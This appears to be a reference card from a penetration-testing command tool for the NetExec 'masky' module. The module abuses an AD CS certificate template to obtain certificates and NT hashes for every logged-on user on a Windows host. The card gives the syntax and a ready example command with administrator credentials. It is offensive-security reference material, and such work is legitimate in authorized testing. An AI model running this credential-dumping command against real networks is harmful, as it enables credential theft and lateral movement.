NetExec masky Module

Remotely abuse a vulnerable certificate template (typically User) to enroll certificates as every interactively-logged-on user on the target host, then convert each cert to its NT hash. Requires local admin and a valid AD CS template.

Tool
nxc
Category
Credential Attacks / Hash Dumping
Platform
linux
Requires
password
Protocols
SMB

Open in Command Manager

Syntax

Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.

nxc smb <target> -u '<user>' -p '<password>' -M masky -o CA='<ca-fqdn>\\<ca-name>'

Examples

nxc smb 10.10.10.10 -u administrator -p 'Password123!' -M masky -o CA='ca.corp.local\\CORP-CA'

Tags

netexec nxc masky adcs user-credentials

References